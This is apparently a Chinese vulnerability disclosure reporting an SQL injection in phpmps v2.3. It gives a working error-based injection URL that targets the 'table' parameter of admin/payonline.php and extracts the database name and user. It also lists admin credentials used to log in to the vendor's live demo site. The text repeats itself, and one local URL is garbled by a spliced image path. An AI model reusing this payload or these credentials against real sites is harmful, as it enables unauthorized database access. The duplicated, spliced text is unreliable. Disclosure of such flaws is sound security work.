### 简要描述: phpmps通用SQL注入(demo测试成功) ### 详细说明: 版本下载地址: http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip [<img src="https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg) http://www.phpmps.com/demo/admin/login.php 使用admin/gxy123123登录成功: SQL注入EXP: http://www.phpmps.com/demo/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 [<img src="https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg" alt="payonline注入.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg) ### 漏洞证明: 本地搭建环境,同样成功:...
### 简要描述: phpmps通用SQL注入(demo测试成功) ### 详细说明: 版本下载地址: http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip [<img src="https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg) http://www.phpmps.com/demo/admin/login.php 使用admin/gxy123123登录成功: SQL注入EXP: http://www.phpmps.com/demo/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 [<img src="https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg" alt="payonline注入.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg) ### 漏洞证明: 本地搭建环境,同样成功: http://localhost/phpmps_v2.3_build140305_utf8https://images.seebug.org/upload/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 [<img src="https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg)
